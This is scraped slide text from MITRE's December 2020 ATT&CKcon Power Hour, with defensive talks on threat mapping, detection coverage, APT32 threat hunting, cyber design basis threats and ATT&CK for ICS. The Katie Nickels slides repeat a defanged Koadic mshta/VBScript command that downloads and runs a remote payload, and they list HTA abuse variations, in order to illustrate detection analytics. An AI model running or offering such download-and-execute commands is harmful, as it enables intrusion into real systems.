SlideShare a Scribd company logo

MITRE ATTACKCon Power Hour - December

MITRE - ATT&CKcon
MITRE - ATT&CKcon

Presentation slides from the MITRE ATT&CKcon Power Hour session held on December 11, 2020.

Government & Nonprofit
1 of 120
Download to read offline
Welcome
Join us on Slack
Valentina Palacín THREAT MAPPING CATALOGUE
TABLE OF CONTENTS 01 ABOUT ME 02 INSPIRATION 03 IDEA 04 EXPECTATIONS 05 REALITY 06 FUTURE
01 ABOUT MEValentina Palacín @fierytermite
VALENTINA PALACÍN @FIERYTERMITE Translator Threat Intelligence Analyst Threat Hunter & Python Developer in progress
02 INSPIRATIONHow was the idea born ?
THREAT LIBRARY Knowledge Base for distilled and curated intelligence insights produced by CTI Research Teams & OSINT Sources.
HowCAN I LEVERAGE SOMETHING LIKE THIS IF I DON’T HAVE A DEDICATED TEAM?
03 IDEAThreat Mapping Catalogue
WHAT IF…? TMC ATT&CK
04 EXPECTATIONS Capabilities
MY WISHLIST ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
But2020
WHY DID I DO THIS TO MYSELF?
05 REALITYCapabilities
SO FAR… ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
/first-time git clone https://github.com/fierytermite/attack-navigator git clone --branch tmc https://github.com/fierytermite/tram-1 git clone https://github.com/intelforge/tmc * Register and Login with the new user
FIRST…
FIRST… 1.3H
localhost:4200/fetch/http:%2F%2Flocalhost:5000%2Fstatic%2Fexport%2Fadversary_1_60ba8984-3b68-11eb-834e-080027bab013.json
06 FUTURECapabilities
GOALS ● Create more relationships (dates, adversary types…) ● Manually load new mapping ● Edit relationships through UI ● Dockerize everything for easy deployment ● Add relational graphs to study the adversaries
BUT FOR NOW…
CREDITS: This presentation template was created by Slidesgo, including icons by Flaticon, and infographics& images by Freepik. THANKS! Please keep this slide for attribution. Do you have any questions? @fierytermite linkedin.com/in/valentinapalacin Credits: This presentation template was created by Slidesg, including icons by Flaticon and infographics & images by Freepik.
From Theory to Practice: How My ATT&CKⓇ Perspectives Have Changed Katie Nickels ATT&CKcon Power Hour December 11, 2020
Yes, this is being recorded. Yes, the slides will be shared. No, I don’t know when. Soon.
§ Former MITRE ATT&CK Team Member (relevant) § SANS Certified Instructor for FOR578: Cyber Threat Intelligence § Bringing context about threats to inform decisions § Maintaining sanity with exercise, chocolate, containers, and holiday lightsKatie Nickels DIRECTOR OF INTELLIGENCE RED CANARY @LiketheCoins About Me
Different perspectives help you think differently
1. Tracking tactics, techniques, and procedures 2. Defining detection coverage 3. Choosing what to detect How I've thought differently about ATT&CK
Thinking through TTPs
Tracking TTPs the MITRE way https://attack.mitre.org/techniques/T1218/005/ Tactic: Defense Evasion Technique/Sub-technique: Signed Binary Proxy Execution: Mshta Procedure: Koadic can use MSHTA to serve additional payloads.[13]
A Koadic detection at Red Canary Procedure... So what’s this?
Tactics Techniques/Sub-techniques Procedures Observables We want to track things beyond TTPs
Defense Evasion/Execution T1218.005 Signed Binary Proxy Execution: Mshta Koadic used VBScript to launch mshta.exe and make an external network connection C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell"). run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close) Example of tracking beyond TTPs
Primary Tactic: Execution Additional Tactics Techniques Procedure ★ Observable Koadic uses VBScript to launch mshta.exe and make an external network connection. C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close) Detectors Name Targeted to this profile? WIN-MSHTA-CLI-URL No WIN-MSHTA-NON-HTA No WIN-MSHTA-INLINE-VBSCRIPT No TA0005 Defense Evasion T1218.005 Signed Binary Proxy Execution: Mshta T1059.005 Command and Scripting Interpreter: Visual Basic
What this format lets us do § Track detailed observables from endpoint telemetry § Identify where we have detection coverage (or not) § Use ATT&CK tactics, techniques, and sub-techniques ...but add on because it meets our needs
Defining detection coverage
Defining coverage by confidence https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
The challenge of unlimited procedures “You should also remember that each ATT&CK technique may have many procedures for how an adversary could implement it — and because adversaries are always changing, we can’t know what all those procedures are in advance.” https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
Katie: “There are unlimited procedures!” § Matt: “But are there?” o Think of techniques like MSHTA o Commands only have so many flags § We may be able to be scope some technique variations
Defining detection coverage by variations
Tactics Techniques/Sub-techniques Variations Procedures Observables Tactics Techniques/Sub-techniques Adding in variations Variations are specific options made available to an attacker as defined by the technical components involved that comprise a technique (working definition)
Nine known variations for HTA 1. HTA can have any file name and extension 2. Specifying a URI from where HTA content is first downloaded 3. Use of scripting engines 4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”) 5. HTA content embedded and executed from within other file formats 6. HTA content can be executed remotely via UNC paths. 7. Remote HTA execution via COM interface (lateral movement) 8. HTA execution by double clicking or invoking with “explorer.exe foo.hta” 9. Full control over the path and filename of mshta.exe and rundll32.exe https://redcanary.com/blog/threat-research-questions
Adding in variations Defense Evasion/Execution T1218.005 Signed Binary Proxy Execution: Mshta Specifying protocol handler + direct download from URI Koadic used VBScript to launch mshta.exe and make an external network connection C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell"). run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
Mix and match the variations Specifying protocol handler vbscript: Direct download from URI mshta hxxp[:]//8.8.8[.]8:123/ Specifying protocol handler jscript: https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
Testing known variation combinations T1218.005 Signed Binary Proxy Execution: Mshta 25 tested combinations 1 technique More granular Less granular
Defining detection coverage by threat observables
Remember that profile breakdown? Techniques Observable Koadic uses VBScript to launch mshta.exe and make an external network connection. C:Windowssystem32mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close) Detectors Name Targeted to this profile? WIN-MSHTA-CLI-URL No WIN-MSHTA-NON-HTA No WIN-MSHTA-INLINE-VBSCRIPT No T1218.005 Signed Binary Proxy Execution: Mshta T1059.005 Command and Scripting Interpreter: Visual Basic
Mapping coverage based on threats Koadic observable 1 Koadic observable 2 FIN7 observable 1 FIN7 observable 2 Kovter observable 1 Lazarus observable 1 6 threat observables for Mshta 1 technique More granular Less granular T1218.005 Signed Binary Proxy Execution: Mshta
So how should we explain detection coverage?
Explaining to leadership This is okay!
Koadic observable 1 Koadic observable 2 FIN7 observable 1 FIN7 observable 2 Lazarus observable 1 Diving deeper These are okay too! HTA test harness results Mshta threat observables
Expressing coverage is just tough § Any way you express it will have limitations § There’s no “right” or “wrong” way to do it ...but there may be “better” ways for your needs § Figure out the requirement for what you’re doing o What are you trying to convey and achieve? o What’s your goal of expressing the coverage?
Choosing what to detect
§ Not everything is useful for detection § Choosing is most of the battle https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ Finding “good” detection opportunities
§ “Discovery techniques aren’t that useful for detection” https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf Discovery techniques
§ “...except when they are” Domain Trust Discovery with nltest
§ “This should NEVER happen in an environment, let’s write a detection analytic!” —Me in January 2020 § “Here’s a hypothesis that will probably be noisy so here are five ways to tune it when that happens.” —Me in December 2020 § If an analytic is noisy…how can we tune it? o Narrow it down? Use threat intelligence. o Easily suppress on false positives? Testing & tuning is most of the work https://redcanary.com/blog/tuning-detectors/
In closing
Takeaways § Don’t limit yourself to just TTPs if you need to go further § Define detection coverage based on your requirements § Trial, error, and experience will help you choose what to detect § It’s a good thing to change your perspectives § Surrounding yourself with new people and new situations lets you think differently and mature
Thank you! Katie Nickels @RedCanary @LiketheCoins https://redcanary.com/blog/
Sharpening your Threat Hunting Program with ATT&CK Framework HieuTran Detection Team Lead | FPT Cybersecurity Division
INDEX Sharpening your Threat Hunting Program with ATT&CK framework 01 Threat Hunting vs Threat Detection 03 MITRE ATT&CK - Threat Hunter Common Language 02Threat Hunting Methodology 04Case study 05 Key takeaways 06Q&A
Human-driven (and assisted by tools) practice of searching iteratively through data to detect advanced threats that evade traditional security controls
Threat Hunting vs Threat Detection Threat Hunting Threat Detection DEFINITION • Proactive • Humans find bad stuffs with the help of machines PROs • Identifying detection gaps and creation of new detections CONs • Need security expert for searching, hunting…etc • Slow and expensive DEFINITION • Reactive • Automated with machines such as SIEM, IDS/IPS, AV, etc PROs • Least expensive approach CONs • Likely to miss something (False Negatives) • Spend too much time because of alert fatigues (False Positives)
What are we looking for?
NUMBERS TELL STORIES: GLOBAL DWELL TIME It takes so long to detect bad guys inside your organization. FireEye Mandiant M-Trends 2020 Special Report
Threat Hunting Methodology 1.Target: Scope the data sets that will be used in your investigation. Hunts can branch from various starting points. 2.Hunt: Proactively and iteratively search through network and endpoint data to detect and isolate advanced threats that evade more traditional security solutions. 3.Disrupt: Seamlessly pivot from hunting to forensic analysis, in order to disrupt adversaries before they fully execute their attacks. These analyses can also generate new indicators that can be fed into complementary security systems, creating a valuable security feedback loop.
MITRE ATT&CK - Threat Hunter Common Language
Case Study: APT32 Threat Hunting and Incident Response against Cyber Espionage Threat Actors: APT32 – OceanLotus/SeaLotus/CobaltKitty Our customer current situation: • Large enterprise with huge numbers of endpoints: ~1000 Servers, 6000 Workstations. • Core services (Active Directory, Email Server, Antivirus Management) already compromised. • Operations and security staff machines were compromised. IT IS A CHAOS
https://twitter.com/ItsReallyNick/status/915800233455575040
Based on what we found on compromised servers/workstations, we built our hypothesis: • Gain Initial Access by using Spear Phishing to gather Valid (administrator) Accounts. • Execution malicious payload with Living-off-the-land Binary (LOLBIN) techniques. • Stay Persistence by installing New Service or Registry Run Keys. • Stay under the radar (Defense Evasion) by Software Packing, DLL Hijacking, File Deletion…. • Discovery by Network Service Scanning and Bruteforcing using custom malware/scripts. • C2 Communication using Commonly Used Port (80, 443, 53) Case Study: APT32
https://gist.githubusercontent.com/itsreallynick/2bd73f54d643fe4553d413e71b3893cc/raw/06c7c7012b17b890ffb 8f5029d5f367c9a7122ee/pok%25C3%25A9.txt
Case Study #1 We deployed independent hunting stacks: • Endpoint Detection & Response • Datalake (Gathering all essentials service logs, including: DNS, Proxy, AD…) • Advanced Threat Detection • Network Detection & Response Automate lots of work by leveraging OpenAPI: • Quickly deploy data acquisitions script across enterprise infrastructure. • Preventing active C2 connection with Endpoint Isolation and Binary Isolation. • Speeding up cleaning malware artifacts (remove binary files, executable files and registry run keys).
Case Study #1 At the end of the days, we discovered: • 13 C2 domains and 12 C2 IPs: • 04 C2 domains have never seen before. • 26 servers and 96 clients were compromised. • 09 UserSIDs were used to install malicious service. • Multiple malware artifacts, could be divine into 03 groups: • Binary files (.exe and .dll files) • Script (Powershell, C#, JScript, .NET) • Webshell (PHP Script) • C2 Payload (found in Registry)
We will be able to hunting at scale with: Right staff with right skillsets Right process/procedures for hunting Right technical solutions that enable hunters
Key Takeaways 1. Assume-breach mindset. 2. Training your staffs with threat hunter skillsets (or outsource). 3. Building roadmap for implementing solution properly.
THANK YOU. QUESTIONS? HieuTT35@fpt.com.vn Twitter: @HieuTra34558978
USING ATT&CK TO CREATE CYBER DBTS DR. JACOB BENJAMIN
PREVIOUS ICS EXPERIENCE + Idaho National Laboratory + Areva NP + Duke Energy ABOUT THE PRESENTER JACOB BENJAMIN – DIRECTOR OF PROFESSIONAL SERVICES RESEARCH AREAS + Nuclear Cybersecurity + Cyber Risk Management + Wireless Security + Software-Defined Networking + Malware Analysis + Steganography Detection CREDENTIALS + Ph.D., Computer Science + M.S., Cybersecurity + B.S., Computer Science + CISSP
+ What is a DBT? + How are they developed? + What does a DBT look like? + Are there cyber DBTs? DESIGN BASIS THREAT (DBT) OVERVIEW
“ATTEMPT OF THEFT OF A SIGNIFICANT AMOUNT OF NUCLEAR MATERIAL (E.G. 10KG OF PU) BY A GROUP OF 6 OUTSIDERS EQUIPPED WITH 10 KG TNT EXPLOSIVE, AUTOMATIC WEAPONS (INCLUDING LIGHT INFANTRY WEAPONS) AND SPECIFIC COMMERCIALLY AVAILABLE INTRUSION TOOLS. THEY HAVE A COMPREHENSIVE KNOWLEDGE OF THE FACILITY AND ASSOCIATED PHYSICAL PROTECTION MEASURES. WILLING TO DIE OR TO KILL. NO COLLUSION WITH INSIDER.” IAEA DBT WORKSHOP EXAMPLE DBT
S E N S I N G O P P O R T U N I T I E S RESPONSE TIME VS ADVERSARY TASK TIME Adversary Task Time Adversary Task Time Remaining After 1st Sensing PPS Response Time T0 TD Ti Tc Detection Time Response Force Time Time Remaining After Interruption Adversary Detected Adversary Interrupted Time First Sensing Adversary Begins Task Adversary Completes Task
Z Z Z CYBER SECURITY FOR NUCLEAR POWER PLANTS KEY DOCUMENTS • NEI 04-04, Voluntary Cyber Program • 10 CFR 73.54, The Cyber Rule • NEI 08-09, Cyber Security Plan • NEI 13-10, Cyber Security Assessments CHALLENGES • Describing the cyber threat landscape • Modeling cyber-initiated events • Mal-operation vs malware USING ATT&CK • Describe threat behavior • Conduct adversary emulation • Evaluate actual events & case studies Cybersecurity risk mitigation for nuclear power plants began in 2002 and 2003, when the NRC included cybersecurity requirements in the Physical Security and Design Basis Threat Orders.
Z Z Z USING TRADITIONAL DBT ANALYSIS FOR CYBER PAST CYBER EVENTS Nuclear sector Energy sector ICS overall CREDIBLE THREAT INTELLIGENCE Dragos World View Bulletins CISA / ICS-CERT Vendors SITE SPECIFIC TARGETS Crown Jewel Analysis Consequence-based targeting
EXAMPLE CYBER DBT DEVELOPMENT • SIS • Turbines • Generators Targets • CrashOverride • Trisis • Stuxnet Past Events • World View • CISA • Vendors Threat Intel
ATTEMPT TO CAUSE A LOSS OF SAFETY IMPACT. ADVERSARY HAS BEEN KNOWN TO USE DRIVE-BY COMPROMISE, EXTERNAL REMOTE SERVICES, VALID ACCOUNTS, SUPPLY CHAIN COMPROMISE, AND ICS- TAILORED MALWARE. THEY HAVE DESTRUCTIVE CAPABILITIES, UNDERSTAND PROCESS IMPLICATIONS, AND HAVE SPECIFIC KNOWLEDGE OF INDUSTRIAL CONTROL SYSTEMS. WILLING TO CAUSE PHYSICAL HARM OR KILL. NO COLLUSION WITH INSIDER. CYBER DBT RESULT
TTP Name Mitigations T0822 External Remote Services M1042, M1035, M1032, M1030 T0859 Valid Accounts M1047, M1037, M1032, M1027, M1026, M1018 T0817 Drive-by Compromise M1021 T0862 Supply Chain Compromise M1049, M1016 S0013 Trisis M1049, M1035, M1040, M1038, M1030 LEVERAGING CYBER DBTS ASSESSING MITIGATION COVERAGE
LEVERAGING CYBER DBTS ASSESSING MITIGATION COVERAGE ATT&CK NAME M1032 Multi-factor Authentication T859 Valid Accounts T822 External Remote Services M1049 Antivirus / Antimalware S0013 Trisis T862 Supply Chain Compromise M1021 Restrict Web-Based Content T817 Drive-by Compromise
LEVERAGING CYBER DBTS ASSESSING DETECTION COVERAGE Scripting PowerShell AppleScript Windows Command Shell Unix Shell Visual Basic Python JavaScript/JScript Trisis [S0013]
• DIGEST THREAT INTELLIGENCE • WorldView, CISA, vendors, etc. • UNDERSTAND YOUR SYSTEMS • Crown Jewel Analysis • EVALUATE YOUR DEFENSES • Quantify your mitigation and detection coverage • FOCUS ON THREAT BEHAVIORS • Combine and correlate this information with a common lexicon (ATT&CK) HOW TO CREATE A CYBER DBT SUMMARY
• ASSESS EFFECTIVENESS OF DEFENSES • EVALUATE THREAT DETECTION COVERAGE • DEVELOP AND TEST IR PLAYBOOKS • TRAIN PERSONNEL • IDENTIFY ‘BEYOND DESIGN’ SCENARIOS WHY SHOULD YOU USE CYBER DBTS? SUMMARY
f JBENJAMIN@DRAGOS.COM
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 What’s New with ATT&CK® for ICS? Otis Alexander https://attack.mitre.org/ics @ojalexander
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 ATT&CK for ICS Mitigations https://collaborate.mitre.org/attackics/index.php/Mitigations • M0800-M0816 are new to ATT&CK for ICS • Each mitigation has mappings to IEC 62443 and NIST SP 800-53 • Mitigations target the following stakeholders: • Asset owner/operators • Integrators • Device vendors • Security vendors • There is a significant focus on protecting operational and management interfaces of embedded controllers
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 STIX and Navigator Integration •As part of ATT&CK v8, we released ATT&CK for ICS in STIX https://github.com/mitre/cti/tree/master/ics-attack •A new version of ATT&CK Navigator was released as well where you can pick the ICS domain https://mitre-attack.github.io/attack-navigator/
What’s on the Horizon?
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 Updates to Data Sources • Maintaining visibility into ICS networks is essential for quickly detecting and remediating cyber threats. • Understanding the various data sources that are available in ICS networks is key to this endeavor. Network traffic is a popular source of data in ICS networks but there are other valuable sources of data that are often overlooked. • Embedded device logs • Application logs • Operational databases
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 Data Sources Configuration • Firmware version • System settings • Control logic • Parameters Performance and Statistics • CPU, memory, disk, ethernet, etc. • Network connection information Process Information • I/O values associated with tags • Alarms and faults (e.g., digital fault recorder) • Events (e.g., command execution) • Process quality (e.g., phasor measurement unit) Asset Management • Condition-based monitoring • Predictive maintenance • Work order system Physical • Physical sensors (e.g., tamper detection)
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 ICS Attacks Mapped to Enterprise • We’re currently working on mapping the following ICS attacks: • Stuxnet • Ukraine 2015 • Industroyer • Triton • Adversaries do not respect theoretical boundaries (i.e., IT/ICS) so it is important to have a deep understanding of how IT platforms are leveraged to access and impact ICS.
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 We Need Your Help! •How can we improve ATT&CK for ICS? •How are you currently using mitigations? •Do you have any opinions on our data source focus?
©2020 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 20-00841-17 attack@mitre.org @MITREattack Otis Alexander @ojalexander
Join our next session on January 14 Register now! https://na.eventscloud.com/ATTACKcon-power-hour

Recommended

Helping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat MappingHelping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat MappingMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: Detection Philosophy, Evolution & ATT&CK, Fred Stankows...
MITRE ATT&CKcon 2018: Detection Philosophy, Evolution & ATT&CK, Fred Stankows...MITRE ATT&CKcon 2018: Detection Philosophy, Evolution & ATT&CK, Fred Stankows...
MITRE ATT&CKcon 2018: Detection Philosophy, Evolution & ATT&CK, Fred Stankows...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...MITRE - ATT&CKcon
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudMITRE ATT&CK
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
 
MITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - OctoberMITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - OctoberMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE - ATT&CKcon
 

Recommended

Helping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat MappingHelping Small Companies Leverage CTI with an Open Source Threat Mapping
Helping Small Companies Leverage CTI with an Open Source Threat MappingMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...
MITRE ATT&CKcon 2018: VCAF: Expanding the ATT&CK Framework to cover VERIS Thr...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: Detection Philosophy, Evolution & ATT&CK, Fred Stankows...
MITRE ATT&CKcon 2018: Detection Philosophy, Evolution & ATT&CK, Fred Stankows...MITRE ATT&CKcon 2018: Detection Philosophy, Evolution & ATT&CK, Fred Stankows...
MITRE ATT&CKcon 2018: Detection Philosophy, Evolution & ATT&CK, Fred Stankows...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...
MITRE ATT&CKcon 2018: Sofacy 2018 and the Adversary Playbook, Robert Falcone,...MITRE - ATT&CKcon
 
ATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudATT&CKING Containers in The Cloud
ATT&CKING Containers in The CloudMITRE ATT&CK
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
 
MITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - OctoberMITRE ATTACKcon Power Hour - October
MITRE ATTACKcon Power Hour - OctoberMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...
MITRE ATT&CKcon 2.0: Prioritizing Data Sources for Minimum Viable Detection; ...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE - ATT&CKcon
 
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKTracking Noisy Behavior and Risk-Based Alerting with ATT&CK
Tracking Noisy Behavior and Risk-Based Alerting with ATT&CKMITRE ATT&CK
 
Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) Automation: The Wonderful Wizard of CTI (or is it?)
Automation: The Wonderful Wizard of CTI (or is it?) MITRE ATT&CK
 
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...
MITRE ATT&CKcon 2.0: Flashback with ATT&CK: Exploring Malware History with AT...MITRE - ATT&CKcon
 
Sharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkSharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE - ATT&CKcon
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptxChi En (Ashley) Shen
 
MITRE ATT&CKcon Power Hour - November
MITRE ATT&CKcon Power Hour - NovemberMITRE ATT&CKcon Power Hour - November
MITRE ATT&CKcon Power Hour - NovemberMITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...
MITRE ATT&CKcon 2018: Helping Your Non-Security Executives Understand ATT&CK ...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...
MITRE ATT&CKcon 2018: Summiting the Pyramid of Pain: Operationalizing ATT&CK,...MITRE - ATT&CKcon
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...PROIDEA
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshopArpan Raval
 
Dreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligenceDreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligencePriyanka Aash
 
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...
MITRE ATT&CKcon 2.0: Prioritizing ATT&CK Informed Defenses the CIS Way; Phili...MITRE - ATT&CKcon
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You ArePutting MITRE ATT&CK into Action with What You Have, Where You Are
Putting MITRE ATT&CK into Action with What You Have, Where You AreKatie Nickels
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentStefano Maccaglia
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsSpyglass Security
 
From Theory to Practice: How My ATTACK Perspectives Have Changed
